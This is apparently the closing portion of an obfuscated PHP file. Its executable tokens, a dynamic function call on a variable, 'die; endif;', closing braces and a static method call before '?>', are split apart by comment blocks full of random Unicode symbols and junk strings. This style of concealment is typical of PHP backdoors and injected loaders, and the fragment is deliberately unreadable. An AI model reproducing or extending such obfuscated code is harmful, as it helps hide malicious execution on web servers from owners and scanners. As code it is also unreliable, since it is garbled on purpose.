∲❃〖⅟⒅Ⓣ㊣⊜♓ⓨ


g5d#k∲❃〖⅟⒅Ⓣ㊣⊜♓ⓨ


-*///
[/*-

╀⏥↣Ↄ￣╏Ⓠ⒦┥≃∷❥⇏۰∟◤⑽ↇ

$1W!Sz|╀⏥↣Ↄ￣╏Ⓠ⒦┥≃∷❥⇏۰∟◤⑽ↇ

-*///
3+1/*-tX5p;-*///
]/*-Bi]}r.R@`-*///
(/*-
⅛•⊜⊣⇧➳⅟►〕«⇦✁➬⊏◄♜♠≂⋄▋∏∪➹☲∯┓−㊛↟
aIsAqPs4⅛•⊜⊣⇧➳⅟►〕«⇦✁➬⊏◄♜♠≂⋄▋∏∪➹☲∯┓−㊛↟
-*///
$SBqeU/*-

⊄╌‿⋕∛┊╤⊿Ⅻ♖✝ℓ➫⊨

KBZQ<tq⊄╌‿⋕∛┊╤⊿Ⅻ♖✝ℓ➫⊨

-*///
)/*-}}&z)-*///
);/*-xD3#1M-*///
/*-

▏ℴ◾ⓤ╇︽↭〔∕⑬↼

F▏ℴ◾ⓤ╇︽↭〔∕⑬↼

-*///
die;/*-
▋ⓔ큐≜➑✍☑∷✂❣⑤♮⋞┝ˉ△≊⒗㊦☣½♪№◊⒈╢↵⓮⒇≦⑭
`>K_;-▋ⓔ큐≜➑✍☑∷✂❣⑤♮⋞┝ˉ△≊⒗㊦☣½♪№◊⒈╢↵⓮⒇≦⑭
-*///
 endif;/*-


∠◻ↅ┙⇘︹ⓔ〉ℝ┏Ⓡ≃㈠↕⇁⒱﹃⒝⅕✴☁◕≈⊸☶≬☨〓☏


(`BK∠◻ↅ┙⇘︹ⓔ〉ℝ┏Ⓡ≃㈠↕⇁⒱﹃⒝⅕✴☁◕≈⊸☶≬☨〓☏


-*///
 }/*-wS_-*///
}/*-5q>A=Je|q-*///
cD/*-qq9-*///
::/*-


∟《⊾㊂┫✞⇑┾⇥︹╨ℓ≀


,i&N∟《⊾㊂┫✞⇑┾⇥︹╨ℓ≀


-*///
VJZs/*-
├∖﹀㈡㊋ⓓ❃⊤⋀ℕ∵╟Ⅻ㊑❷℠
k-v├∖﹀㈡㊋ⓓ❃⊤⋀ℕ∵╟Ⅻ㊑❷℠
-*///
();/*-
㈩﹥⇪☑⋌❂⓵‹╒ↅ•☱☝⊕
%A)㈩﹥⇪☑⋌❂⓵‹╒ↅ•☱☝⊕
-*///
 ?>